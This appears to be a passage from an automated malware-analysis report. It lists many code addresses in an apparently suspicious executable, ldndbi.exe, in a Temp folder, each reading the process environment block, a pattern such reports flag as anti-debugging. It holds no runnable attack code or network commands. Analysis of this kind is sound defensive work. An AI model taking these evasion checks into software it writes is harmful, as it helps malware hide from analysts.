          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h]
